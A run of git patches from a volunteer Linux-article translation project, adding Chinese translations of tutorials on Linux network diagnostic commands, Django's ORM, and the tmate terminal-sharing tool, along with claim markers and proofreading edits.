limit this to listening and established connections (generally much more useful), use the **netstat -at** command instead. +**netstat -a** 命令将显示 **_所有_** 网络连接。为了将其限制为正在监听和已建立的连接(通常更有用),请改用 **netstat -at** 命令。 ``` $ netstat -at @@ -105,9 +103,9 @@ tcp6 0 0 ip6-localhost:ipp [::]:* LISTEN tcp6 0 0 ip6-localhost:smtp [::]:* LISTEN ``` -### netstat -rn command +### netstat -rn 命令 -The **netstat -rn** command displays the system's routing table. The 192.168.0.1 address is the local gateway (Flags=UG). +**netstat -rn** 展示系统的路由表。192.168.0.1 是本地网关 (Flags=UG)。 ``` $ netstat -rn @@ -117,9 +115,9 @@ Destination Gateway Genmask Flags MSS Window irtt Iface 192.168.0.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0 ``` -### host command +### host 命令 -The **host** command works a lot like **nslookup** by looking up the remote system's IP address, but also provides the system's mail handler. +**host** 命令就像 **nslookup** 一样,用来查询远程系统的 IP 地址,但是还提供系统的邮箱处理地址。 ``` $ host world.std.com @@ -127,9 +125,9 @@ world.std.com has address 192.74.137.5 world.std.com mail is handled by 10 smtp.theworld.com. ``` -### nslookup command +### nslookup 命令 -The **nslookup** also provides information on the system (in this case, the local system) that is providing DNS lookup services. +**nslookup** 还提供系统中(本例中是本地系统)提供 DNS 查询服务的信息。 ``` $ nslookup world.std.com @@ -141,9 +139,9 @@ Name: world.std.com Address: 192.74.137.5 ``` -### dig command +### dig 命令 -The **dig** command provides quitea lot of information on connecting to a remote system -- including the name server we are communicating with and how long the query takes to respond and is often used for troubleshooting. +**dig** 命令提供了很多有关连接到远程系统的信息 - 包括与我们通信的名称服务器以及查询需要多长时间进行响应,并经常用于故障排除。 ``` $ dig world.std.com @@ -168,9 +166,9 @@ world.std.com. 78146 IN A 192.74.137.5 ;; MSG SIZE rcvd: 58 ``` -### nmap command +### nmap 命令 -The **nmap** command is most frequently used to probe remote systems, but can also be used to report on the services being offered by the local system. In the output below, we can see that ssh is available for logins, that smtp is servicing email, that a web site is active, and that an ipp print service is running. +**nmap** 经常用于探查远程系统,但是同样也用于报告本地系统提供的服务。在下面的输出中,我们可以看到登录可以使用 ssh、smtp 用于电子邮箱、web 站点也是启用的,并且 ipp 打印服务正在运行。 ``` $ nmap localhost @@ -188,14 +186,14 @@ PORT STATE SERVICE Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds ``` -Linux systems provide a lot of useful commands for reviewing their network configuration and connections. If you run out of commands to explore, keep in mind that **apropos network** might point you toward even more. +Linux 系统提供了很多有用的命令用于查看网络配置和连接。如果你都探索完了,请记住 **apropos network** 或许会让你了解更多。 -------------------------------------------------------------------------------- via: https://www.networkworld.com/article/3230519/linux/examining-network-connections-on-linux-systems.html 作者:[Sandra Henry-Stocker][a] -译者:[译者ID](https://github.com/译者ID) +译者:[geekpi](https://github.com/geekpi) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 307f383e2328dc15288fd1071d4bbbfc8f8800ea Mon Sep 17 00:00:00 2001 From: geekpi Date: Thu, 30 Nov 2017 08:48:45 +0800 Subject: [PATCH 0081/1627] translatig --- .../20171029 A block layer introduction part 1 the bio layer.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171029 A block layer introduction part 1 the bio layer.md b/sources/tech/20171029 A block layer introduction part 1 the bio layer.md index b01269ff63..065a3720b4 100644 --- a/sources/tech/20171029 A block layer introduction part 1 the bio layer.md +++ b/sources/tech/20171029 A block layer introduction part 1 the bio layer.md @@ -1,3 +1,5 @@ +translating---geekpi + A block layer introduction part 1: the bio layer ============================================================ From 23a67548f11caf6bd087a15cead354b5586355f8 Mon Sep 17 00:00:00 2001 From: qhwdw <33189910+qhwdw@users.noreply.github.com> Date: Thu, 30 Nov 2017 10:27:36 +0800 Subject: [PATCH 0082/1627] Translated by qhwdw Translated by qhwdw --- ...71124 An introduction to the Django ORM.md | 196 ++++++++++++++++++ 1 file changed, 196 insertions(+) create mode 100644 translated/tech/20171124 An introduction to the Django ORM.md diff --git a/translated/tech/20171124 An introduction to the Django ORM.md b/translated/tech/20171124 An introduction to the Django ORM.md new file mode 100644 index 0000000000..789640441b --- /dev/null +++ b/translated/tech/20171124 An introduction to the Django ORM.md @@ -0,0 +1,196 @@ +Django ORM 简介 +============================================================ + +### 学习怎么去使用 Python 的 web 框架中的对象关系映射与你的数据库交互,就像你使用 SQL 一样。 + + +![Getting to know the Django ORM](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/web-spider-frame-framework.png?itok=Rl2AG2Dc "Getting to know the Django ORM") +Image by : [Christian Holmér][10]. Modified by Opensource.com. [CC BY-SA 4.0][11] + +你可能听说过 [Django][12],它是一个被称为“完美主义者的最后期限” 的 Python web 框架。它是一匹 [可爱的小矮马][13]。 + +Django 的其中一个强大的功能是它的对象关系映射(ORM),它允许你去和你的数据库交互,就像你使用 SQL 一样。事实上,Django 的 ORM 就是创建 SQL 去查询和维护数据库的一个 Python 的方法,并且在一个 Python 方法中获取结果。 我说 _就是_ 一种方法,但实际上,它是一项非常聪明的工程,它利用了 Python 中比较复杂的部分,使得开发过程更容易。 + +在我们开始去了解 ORM 是怎么工作的之前,我们需要一个去操作的数据库。和任何一个关系型数据库一样,我们需要去定义一堆表和它们的关系(即,它们相互之间联系起来的方式)。让我们使用我们熟悉的东西。比如说,我们需要去建立一个有博客文章和作者的博客。每个作者有一个名字。一位作者可以有很多的博客文章。一篇博客文章可以有很多的作者、标题、内容和发布日期。 + +在 Django-ville 中,这个文章和作者的概念可以被称为博客应用。在这个语境中,一个应用是一个自包含一系列描述我们的博客行为和功能的模型和视图。用正确的方式打包,以便于其它的 Django 项目可以使用我们的博客应用。在我们的项目中,博客正是其中的一个应用。比如,我们也可以有一个论坛应用。但是,我们仍然坚持我们的博客应用的原有范围。 + +这是为这个教程事先准备的 `models.py`: + +``` +from django.db import models + +class Author(models.Model): +    name = models.CharField(max_length=100) + +    def __str__(self): +        return self.name + +class Post(models.Model): +    title = models.CharField(max_length=100) +    content = models.TextField() +    published_date = models.DateTimeField(blank=True, null=True) +    author = models.ManyToManyField(Author, related_name="posts") + +    def __str__(self): +        return self.title +``` + +更多的 Python 资源 + +* [Python 是什么?][1] + +* [最好的 Python IDEs][2] + +* [最好的 Python GUI 框架][3] + +* [最新的 Python 内容][4] + +* [更多的开发者资源][5] + +现在,看上去似乎有点令人恐惧,因此,我们把它分解来看。我们有两个模型:作者和文章。它们都有名字或者标题。文章为内容设置一个大文本框,以及为发布的时间和日期设置一个 `DateTimeField`。文章也有一个 `ManyToManyField`,它同时链接到文章和作者。 + +大多数的教程都是从 scratch—but 开始的,但是,在实践中并不会发生这种情况。实际上,它会提供给你一堆已存在的代码,就像上面的 `model.py` 一样,而你必须去搞清楚它们是做什么的。 + +因此,现在你的任务是去进入到应用程序中去了解它。做到这一点有几种方法,你可以登入到 [Django admin][14],一个 Web 后端,它有全部列出的应用和操作它们的方法。我们先退出它,现在我们感兴趣的东西是 ORM。 + +我们可以在 Django 项目的主目录中运行 `python manage.py shell` 去访问 ORM。 + +``` +/srv/web/django/ $ python manage.py shell + +Python 3.6.3 (default, Nov  9 2017, 15:58:30) +[GCC 4.2.1 Compatible Apple LLVM 9.0.0 (clang-900.0.38)] on darwin +Type "help", "copyright", "credits" or "license" for more information. +(InteractiveConsole) +>>> +``` + +这将带我们进入到交互式控制台。[`shell` 命令][15] 为我们做了很多设置,包括导入我们的设置和配置 Django 环境。虽然我们启动了 shell,但是,在我们导入它之前,我们并不能访问我们的博客模型。 + +``` +>>> from blog.models import * +``` + +它导入了全部的博客模型,因此,我们可以玩我们的博客了。 + +首先,我们列出所有的作者。 + +``` +>>> Author.objects.all() +``` + +我们将从这个命令取得结果,它是一个 `QuerySet`,它列出了所有我们的作者对象。它不会充满我们的整个控制台,因为,如果有很多查询结果,Django 将自动截断输出结果。 + +``` +>>> Author.objects.all() +, + , '...(remaining elements truncated)...'] +``` + +我们可以使用 `get` 代替 `all` 去检索单个作者。但是,我们需要一些更多的信息去 `get` 一个单个记录。在关系型数据库中,表有一个主键,它唯一标识了表中的每个记录,但是,作者名并不唯一。许多人都 [重名][16],因此,它不是唯一约束的一个好的选择。解决这个问题的一个方法是使用一个序列(1、2、3...)或者一个通用唯一标识符(UUID)作为主键。但是,因为它对人类并不可用,我们可以通过使用 `name` 来操作我们的作者对象。 + +``` +>>> Author.objects.get(name="VM (Vicky) Brasseur") + +``` + +到现在为止,我们已经有了一个我们可以交互的对象,而不是一个 `QuerySet` 列表。我们现在可以与这个 Python 对象进行交互了,使用任意一个表列做为属性去查看对象。 + +``` +>>> vmb = Author.objects.get(name="VM (Vicky) Brasseur") +>>> vmb.name +u'VM (Vicky) Brasseur' +``` + +然后,很酷的事件发生了。通常在关系型数据库中,如果我们希望去展示其它表的信息,我们需要去写一个 `LEFT JOIN`,或者其它的表耦合函数,并确保它们之间有匹配的外键。而 Django 可以为我们做到这些。 + +在我们的模型中,由于作者写了很多的文章,因此,我们的作者对象可以检查它自己的文章。 + +``` +>>> vmb.posts.all() +QuerySet[, + , + , + '...(remaining elements truncated)...'] +``` + +We can manipulate `QuerySets` using normal pythonic list manipulations. + +``` +>>> for post in vmb.posts.all(): +...   print(post.title) +... +7 tips for nailing your job interview +5 tips for getting the biggest bang for your cover letter buck +Quit making these 10 common resume mistakes +``` + +去实现更复杂的查询,我们可以使用过滤得到我们想要的内容。这是非常微妙的。在 SQL 中,你可以有一些选项,比如,`like`、`contains`、和其它的过滤对象。在 ORM 中这些事情也可以做到。但是,是通过 _特别的_ 方式实现的:是通过使用一个隐式(而不是显式)定义的函数实现的。 + +如果在我的 Python 脚本中调用了一个函数 `do_thing()`,我期望在某个地方有一个匹配 `def do_thing`。这是一个显式的函数定义。然而,在 ORM 中,你可以调用一个 _不显式定义的_ 函数。之前,我们使用 `name` 去匹配一个名字。但是,如果我们想做一个子串搜索,我们可以使用 `name__contains`。 + +``` +>>> Author.objects.filter(name__contains="Vic") +QuerySet[] +``` + +现在,关于双下划线(`__`)我有一个小小的提示。这些是 Python _特有的_。在 Python 的世界里,你可以看到如 `__main__` 或者 `__repr__`。这些有时被称为 `dunder methods`,是 “双下划线” 的缩写。这里仅有几个非字母数字字符可以被用于 Python 中的对象名字;下划线是其中的一个。这些在 ORM 中被用于不同的过滤关键字的显式分隔。在底层,字符串被这些下划线分割。并且这个标记是分开处理的。`name__contains` 被替换成 `attribute: name, filter: contains`。在其它编程语言中,你可以使用箭头代替,比如,在 PHP 中是 `name->contains`。不要被双下划线吓着你,正好相反,它们是 Python 的好帮手(并且如果你斜着看,你就会发现它看起来像一条小蛇,想去帮你写代码的小蟒蛇)。 + +ORM 是非常强大并且是 Python 特有的。不过,在 Django 的管理网站上我提到过上面的内容。 + +### [django-admin.png][6] + +![Django Admin](https://opensource.com/sites/default/files/u128651/django-admin.png "Django Admin") + +Django 的其中一个非常精彩的用户可访问特性是它的管理界面,如果你定义你的模型,你将看到一个非常好用的基于 web 的编辑门户,而且它是免费的。 + +ORM,有多强大? + +### [django-admin-author.png][7] + +![Authors list in Django Admin](https://opensource.com/sites/default/files/u128651/django-admin-author.png "Authors list in Django Admin") + +好吧!给你一些代码去创建最初的模型,Django 转到基于 web 的门户,它是非常强大的,它可以使用我们前面用过的同样的原生函数。默认情况下,这个管理门户只有基本的东西,但这只是在你的模型中添加一些定义去改变外观的问题。例如,在早期的这些 `__str__` 方法中,我们使用这些去定义作者对象应该有什么?(在这种情况中,比如,作者的名字),做了一些工作后,你可以创建一个界面,让它看起来像一个内容管理系统,以允许你的用户去编辑他们的内容。(例如,为一个标记为 “已发布” 的文章,增加一些输入框和过滤)。 + +如果你想去了解更多内容,[Django 美女的教程][17] 中关于 [the ORM][18] 的节有详细的介绍。在 [Django project website][19] 上也有丰富的文档。 + +-------------------------------------------------------------------------------- + +作者简介: + +Katie McLaughlin - Katie 在过去的这几年有许多不同的头衔,她以前是使用多种语言的一位软件开发人员,多种操作系统的系统管理员,和多个不同话题的演讲者。当她不改变 “世界” 的时候,她也去享受烹饪、挂毯艺术,和去研究各种应用程序栈怎么去处理 emoji。 + +------------------------ + +via: https://opensource.com/article/17/11/django-orm + +作者:[Katie McLaughlin Feed ][a] +译者:[qhwdw](https://github.com/qhwdw) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/glasnt +[1]:https://opensource.com/resources/python?intcmp=7016000000127cYAAQ +[2]:https://opensource.com/resources/python/ides?intcmp=7016000000127cYAAQ +[3]:https://opensource.com/resources/python/gui-frameworks?intcmp=7016000000127cYAAQ +[4]:https://opensource.com/tags/python?intcmp=7016000000127cYAAQ +[5]:https://developers.redhat.com/?intcmp=7016000000127cYAAQ +[6]:https://opensource.com/file/377811 +[7]:https://opensource.com/file/377816 +[8]:https://opensource.com/article/17/11/django-orm?rate=iwO0q67yiUUPweMIMoyLbbYyhK5RTOOzEtyiNkJ0eBE +[9]:https://opensource.com/user/41661/feed +[10]:https://www.flickr.com/people/crsan/ +[11]:https://creativecommons.org/licenses/by-sa/4.0/ +[12]:https://www.djangoproject.com/ +[13]:http://www.djangopony.com/ +[14]:https://docs.djangoproject.com/en/1.11/ref/contrib/admin/ +[15]:https://docs.djangoproject.com/en/1.11/ref/django-admin/#shell +[16]:https://2016.katieconf.xyz/ +[17]:https://djangogirls.org/ +[18]:https://tutorial.djangogirls.org/en/django_orm/ +[19]:https://docs.djangoproject.com/en/1.11/topics/db/ +[20]:https://opensource.com/users/glasnt +[21]:https://opensource.com/users/glasnt +[22]:https://opensource.com/article/17/11/django-orm#comments From eeee8dda6c8e4a51b8103d013e279e0b1f3a45fb Mon Sep 17 00:00:00 2001 From: qhwdw <33189910+qhwdw@users.noreply.github.com> Date: Thu, 30 Nov 2017 10:28:34 +0800 Subject: [PATCH 0083/1627] Translated by qhwdw Translated by qhwdw --- ...71124 An introduction to the Django ORM.md | 197 ------------------ 1 file changed, 197 deletions(-) delete mode 100644 sources/tech/20171124 An introduction to the Django ORM.md diff --git a/sources/tech/20171124 An introduction to the Django ORM.md b/sources/tech/20171124 An introduction to the Django ORM.md deleted file mode 100644 index 4a183ce6c1..0000000000 --- a/sources/tech/20171124 An introduction to the Django ORM.md +++ /dev/null @@ -1,197 +0,0 @@ -Translating by qhwdw -An introduction to the Django ORM -============================================================ - -### Learn how to use the Python web framework's object-relational mapper to interact with your database, just like you would with SQL. - - -![Getting to know the Django ORM](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/web-spider-frame-framework.png?itok=Rl2AG2Dc "Getting to know the Django ORM") -Image by : [Christian Holmér][10]. Modified by Opensource.com. [CC BY-SA 4.0][11] - -You might have heard of [Django][12], the Python web framework for "perfectionists with deadlines." It's that one with the [cute pony][13]. - -One of the most powerful features of Django is its Object-Relational Mapper (ORM), which enables you to interact with your database, like you would with SQL. In fact, Django's ORM is just a pythonical way to create SQL to query and manipulate your database and get results in a pythonic fashion. Well, I say  _just_  a way, but it's actually really clever engineering that takes advantage of some of the more complex parts of Python to make developers' lives easier. - -Before we start looking into how the ORM works, we need a database to manipulate. As with any relational database, we need to define a bunch of tables and their relationships (i.e., the way they relate to each other). Let's use something familiar. For example, say we want to model a blog that has blog posts and authors. An author has a name. An author can have many blog posts. A blog post can have many authors and has a title, content, and a published date. - -In Django-ville, this concept of posts and authors could be called our Blog app. In this context, an app is a self-contained set of models and views that describes the behavior and functionality of our blog. Packaged in the right way, many Django projects could use our Blog app. In our project, the Blog could just be one app. We might also have a Forum app, for example. But we'll stick with the original scope of our Blog app. - -Here's a `models.py` prepared for this tutorial: - -``` -from django.db import models - -class Author(models.Model): -    name = models.CharField(max_length=100) - -    def __str__(self): -        return self.name - -class Post(models.Model): -    title = models.CharField(max_length=100) -    content = models.TextField() -    published_date = models.DateTimeField(blank=True, null=True) -    author = models.ManyToManyField(Author, related_name="posts") - -    def __str__(self): -        return self.title -``` - -More Python Resources - -* [What is Python?][1] - -* [Top Python IDEs][2] - -* [Top Python GUI frameworks][3] - -* [Latest Python content][4] - -* [More developer resources][5] - -Now this might look a bit daunting, so let's break it down. We have two models: Author and Post. Each has a name or title. The post has a big text field for content and a `DateTimeField` for the publication date and time. Post also has a `ManyToManyField`, which links posts and authors together. - -Most tutorials start from scratch—but that's not what's going to happen in practice. In reality, you're going to be given a bunch of existing code like the `model.py` above, and you have to work out what it all means. - -So it's now your task to go into the application and take a look around. There are a few ways to do this. You could log in to [Django admin][14], a web-based backend that has all the apps listed and the ways to manipulate them. We'll get back to that; here we're interested in the ORM. - -We can access the ORM by running `python manage.py shell` from the main directory of our Django project. - -``` -/srv/web/django/ $ python manage.py shell - -Python 3.6.3 (default, Nov  9 2017, 15:58:30) -[GCC 4.2.1 Compatible Apple LLVM 9.0.0 (clang-900.0.38)] on darwin -Type "help", "copyright", "credits" or "license" for more information. -(InteractiveConsole) ->>> -``` - -This will bring us into an interactive console. The [`shell` command][15] did a lot of setup for us, including importing our settings and configuring the Django environment. While we've launched the shell, we can't access our Blog model until we import it. - -``` ->>> from blog.models import * -``` - -This imports all the blog models so we can play with our blog posts and authors. - -For starters, let's get a list of all the authors. - -``` ->>> Author.objects.all() -``` - -What we'll get from this command is a `QuerySet` of results, which lists all our Author objects. We also won't fill our entire console, because if there are a lot of results, Django will automatically truncate the printed results. - -``` ->>> Author.objects.all() -, - , '...(remaining elements truncated)...'] -``` - -We can select a single author using `get` instead of `all`. But we need a bit more information to `get` a single record. In relational databases, tables have a primary key field that has a unique identifier for each and every record in a table; however, author names are not unique. Many people [share the same name][16], so it's not a good unique constraint. A way to get around this is to have a sequence (1, 2, 3...) or a universal unique identifier (UUID) as the primary key. But since these aren't nicely useable by humans, we can manipulate our Author objects by using `name`. - -``` ->>> Author.objects.get(name="VM (Vicky) Brasseur") - -``` - -This time, we have a single object that we can interact with, instead of a `QuerySet` list. We can interact with this object pythonically, using any of the table columns as attributes to look at the object. - -``` ->>> vmb = Author.objects.get(name="VM (Vicky) Brasseur") ->>> vmb.name -u'VM (Vicky) Brasseur' -``` - -And this is where the cool stuff happens. Normally in relational databases, if we want to show information for other tables, we'd need to write a `LEFT JOIN`, or other table-coupling functions, making sure that our foreign keys match up between tables. Django takes care of that for us. - -In our model, authors write many posts, so our Author object can check what posts the author has made. - -``` ->>> vmb.posts.all() -QuerySet[, - , - , - '...(remaining elements truncated)...'] -``` - -We can manipulate `QuerySets` using normal pythonic list manipulations. - -``` ->>> for post in vmb.posts.all(): -...   print(post.title) -... -7 tips for nailing your job interview -5 tips for getting the biggest bang for your cover letter buck -Quit making these 10 common resume mistakes -``` - -To do more complex querying, we can use filters instead of getting everything. Here is where it gets tricky. In SQL, you have options such as `like`, `contains`, and other filtering objects. You can do all these things in the ORM, too, but it has a special way of doing them: by using implicitly (rather than explicitly) defined functions. - -If I call a function `do_thing()` in my Python script, I'd expect somewhere there would be a matching `def do_thing`. This is an explicit functional definition. However, in the ORM, you can call a function that  _isn't explicitly defined_ . Before, we were using `name` to match on a name. But, if we wanted to do a substring search, we can use `name__contains`. - -``` ->>> Author.objects.filter(name__contains="Vic") -QuerySet[] -``` - -Now, a small note about the double underscore (`__`). These are  _very_  Python. You may have seen `__main__` or `__repr__` in your travels in Pythonland. These are sometimes referred to as `dunder methods`, a shortening of "double underscore." There are only a few non-alphanumeric characters that can be used in object names in Python; underscore is one of them. These are used in the ORM as an explicit separator of different parts of the filter key name. Under the hood, the string is split by these underscores, and the tokens are processed separately. `name__contains` gets changed into `attribute: name, filter: contains`. In other programming languages, you may use arrows instead, such as `name->contains` in PHP. Don't let dunders scare you, they're just pythonic helpers! (And if you squint, you could say they look like little snakes, little pythons that want to help you with your code.) - -The ORM is extremely powerful and very pythonic. But what about that Django admin site I mentioned above? - -### [django-admin.png][6] - -![Django Admin](https://opensource.com/sites/default/files/u128651/django-admin.png "Django Admin") - -One of the brilliant user-accessibility features of Django is its admin interface. If you define your models, you get a nice web-based editing portal, for free. - -And what powers this? The ORM. - -### [django-admin-author.png][7] - -![Authors list in Django Admin](https://opensource.com/sites/default/files/u128651/django-admin-author.png "Authors list in Django Admin") - -That's right! Given the code used to create the original models, Django turned that into a web-based portal, which is powered using the same raw functions we used earlier. By default, the admin is basic, but it's just a matter of adding more definitions in your model to change how the admin looks. For example, those `__str__` methods from earlier? We use those to define what an Author object looks like (in this case, just the name of the author). With a bit of work, you can make an interface that feels like a full content management system that allows your users to edit their own content with ease (for example, adding fields and filters for marking a post "published"). - -If you'd like to know more, the [Django Girls tutorial][17] section about [the ORM][18] has a detailed walkthrough. There's also copious documentation on the [Django project website][19]. - --------------------------------------------------------------------------------- - -作者简介: - -Katie McLaughlin - Katie has worn many different hats over the years. She has previously been a software developer for many languages, systems administrator for multiple operating systems, and speaker on many different topics. When she's not changing the world, she enjoys making cooking, tapestries, and seeing just how well various application stacks handle emoji. - ------------------------- - -via: https://opensource.com/article/17/11/django-orm - -作者:[Katie McLaughlin Feed ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/glasnt -[1]:https://opensource.com/resources/python?intcmp=7016000000127cYAAQ -[2]:https://opensource.com/resources/python/ides?intcmp=7016000000127cYAAQ -[3]:https://opensource.com/resources/python/gui-frameworks?intcmp=7016000000127cYAAQ -[4]:https://opensource.com/tags/python?intcmp=7016000000127cYAAQ -[5]:https://developers.redhat.com/?intcmp=7016000000127cYAAQ -[6]:https://opensource.com/file/377811 -[7]:https://opensource.com/file/377816 -[8]:https://opensource.com/article/17/11/django-orm?rate=iwO0q67yiUUPweMIMoyLbbYyhK5RTOOzEtyiNkJ0eBE -[9]:https://opensource.com/user/41661/feed -[10]:https://www.flickr.com/people/crsan/ -[11]:https://creativecommons.org/licenses/by-sa/4.0/ -[12]:https://www.djangoproject.com/ -[13]:http://www.djangopony.com/ -[14]:https://docs.djangoproject.com/en/1.11/ref/contrib/admin/ -[15]:https://docs.djangoproject.com/en/1.11/ref/django-admin/#shell -[16]:https://2016.katieconf.xyz/ -[17]:https://djangogirls.org/ -[18]:https://tutorial.djangogirls.org/en/django_orm/ -[19]:https://docs.djangoproject.com/en/1.11/topics/db/ -[20]:https://opensource.com/users/glasnt -[21]:https://opensource.com/users/glasnt -[22]:https://opensource.com/article/17/11/django-orm#comments From ce91ad9cffab81cd11d7a24aaaed84fe7c8e741e Mon Sep 17 00:00:00 2001 From: qhwdw <33189910+qhwdw@users.noreply.github.com> Date: Thu, 30 Nov 2017 10:33:42 +0800 Subject: [PATCH 0084/1627] Translating by qhwdw Translating by qhwdw --- ...se SVG as a Placeholder and Other Image Loading Techniques.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md b/sources/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md index 964eca9356..20731a03e4 100644 --- a/sources/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md +++ b/sources/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md @@ -1,3 +1,4 @@ +Translating by qhwdw How to use SVG as a Placeholder, and Other Image Loading Techniques ============================================================ From 58bb05599a0228d803a64f496a1c0bc2d54a1a29 Mon Sep 17 00:00:00 2001 From: wxy Date: Thu, 30 Nov 2017 12:23:03 +0800 Subject: [PATCH 0085/1627] =?UTF-8?q?PRF:20171128=20tmate=20=E2=80=93=20In?= =?UTF-8?q?stantly=20Share=20Your=20Terminal=20Session=20To=20Anyone=20In?= =?UTF-8?q?=20Seconds.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @lujun9972 --- ...our Terminal Session To Anyone In Seconds.md | 57 ++++++++++--------- 1 file changed, 29 insertions(+), 28 deletions(-) diff --git a/translated/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md b/translated/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md index 16b239f0c8..c44add76f4 100644 --- a/translated/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md +++ b/translated/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md @@ -1,4 +1,4 @@ -tmate -- 秒级分享你的终端会话 +tmate:秒级分享你的终端会话 ================= 不久前,我们写过一篇关于 [teleconsole](https://www.2daygeek.com/teleconsole-share-terminal-session-instantly-to-anyone-in-seconds/) 的介绍,该工具可用于快速分享终端给任何人(任何你信任的人)。今天我们要聊一聊另一款类似的应用,名叫 `tmate`。 @@ -7,17 +7,16 @@ tmate -- 秒级分享你的终端会话 ### 什么是 tmate? -[tmate](https://tmate.io/) 的意思是 `teammates`,它是 tmux 的一个分支,并且使用相同的配置信息(例如快捷键配置,配色方案等)。 -它是一个终端多路复用器,同时具有即时分享终端的能力。它允许在单个屏幕中创建并操控多个终端,同时这些终端还能与其他同事分享。 +[tmate](https://tmate.io/) 的意思是 `teammates`,它是 tmux 的一个分支,并且使用相同的配置信息(例如快捷键配置,配色方案等)。它是一个终端多路复用器,同时具有即时分享终端的能力。它允许在单个屏幕中创建并操控多个终端,同时这些终端还能与其他同事分享。 -你可以分离会话,让作业在后台运行,然后在想要查看状态时重新连接会话. `tmate` 提供了一个即时配对的方案,让你可以与一个或多个队友共享一个终端。 +你可以分离会话,让作业在后台运行,然后在想要查看状态时重新连接会话。`tmate` 提供了一个即时配对的方案,让你可以与一个或多个队友共享一个终端。 在屏幕的地步有一个状态栏,显示了当前会话的一些诸如 ssh 命令之类的共享信息。 ### tmate 是怎么工作的? -- 运行 `tmate` 时,会通过 `libssh` 在后台创建一个连接到 tmate.io (由 tmate 开发者维护的后台服务器)的ssh 连接。 -- 服务器 (tmate.io) 的 ssh 密钥前面通过 DH 交换进行校验。 +- 运行 `tmate` 时,会通过 `libssh` 在后台创建一个连接到 tmate.io (由 tmate 开发者维护的后台服务器)的 ssh 连接。 +- tmate.io 服务器的 ssh 密钥通过 DH 交换进行校验。 - 客户端通过本地 ssh 密钥进行认证。 - 连接创建后,本地 tmux 服务器会生成一个 150 位(不可猜测的随机字符)会话令牌。 - 队友能通过用户提供的 SSH 会话 ID 连接到 tmate.io。 @@ -26,24 +25,25 @@ tmate -- 秒级分享你的终端会话 由于 `tmate.io` 服务器需要通过本地 ssh 密钥来认证客户机,因此其中一个必备条件就是生成 SSH 密钥 key。 记住,每个系统都要有自己的 SSH 密钥。 + ```shell $ ssh-keygen -t rsa -Generating public/private rsa key pair。 +Generating public/private rsa key pair. Enter file in which to save the key (/home/magi/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: -Your identification has been saved in /home/magi/.ssh/id_rsa。 -Your public key has been saved in /home/magi/.ssh/id_rsa.pub。 +Your identification has been saved in /home/magi/.ssh/id_rsa. +Your public key has been saved in /home/magi/.ssh/id_rsa.pub. The key fingerprint is: -SHA256:3ima5FuwKbWyyyNrlR/DeBucoyRfdOtlUmb5D214NC8 [email protected] +SHA256:3ima5FuwKbWyyyNrlR/DeBucoyRfdOtlUmb5D214NC8 magi@magi-VirtualBox The key's randomart image is: +---[RSA 2048]----+ | | | | | . | | . . = o | -| *ooS= 。 o | -| . [email protected]*o.o.+ E .| +| *ooS= . + o | +| . =.@*o.o.+ E .| | =o==B++o = . | | o.+*o+.. . | | ..o+o=. | @@ -54,8 +54,7 @@ The key's randomart image is: `tmate` 已经包含在某些发行版的官方仓库中,可以通过包管理器来安装。 -对于 **`Debian/Ubuntu`**,可以使用 [APT-GET 命令](https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/) -或者 [APT 命令](https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/)to 来安装。 +对于 Debian/Ubuntu,可以使用 [APT-GET 命令](https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/)或者 [APT 命令](https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/)to 来安装。 ```shell $ sudo apt-get install software-properties-common @@ -70,14 +69,13 @@ $ sudo apt-get install tmate $ sudo apt-get install tmate ``` -对于 **`Fedora`**,使用 [DNF 命令](https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/) 来安装。 +对于 Fedora,使用 [DNF 命令](https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/) 来安装。 ```shell $ sudo dnf install tmate ``` -对于基于 **`Arch Linux`** 的系统,使用 []()[Yaourt 命令](https://www.2daygeek.com/install-yaourt-aur-helper-on-arch-linux/) -或 []()[Packer 命令](https://www.2daygeek.com/install-packer-aur-helper-on-arch-linux/) 来从 AUR 仓库中安装。 +对于基于 Arch Linux 的系统,使用 []()[Yaourt 命令](https://www.2daygeek.com/install-yaourt-aur-helper-on-arch-linux/)或 []()[Packer 命令](https://www.2daygeek.com/install-packer-aur-helper-on-arch-linux/) 来从 AUR 仓库中安装。 ```shell $ yaourt -S tmate @@ -88,7 +86,7 @@ $ yaourt -S tmate $ packer -S tmate ``` -对于 **`openSUSE`**,使用 [Zypper 命令](https://www.2daygeek.com/zypper-command-examples-manage-packages-opensuse-system/) 来安装。 +对于 openSUSE,使用 [Zypper 命令](https://www.2daygeek.com/zypper-command-examples-manage-packages-opensuse-system/) 来安装。 ```shell $ sudo zypper in tmate @@ -102,7 +100,7 @@ $ sudo zypper in tmate $ tmate ``` 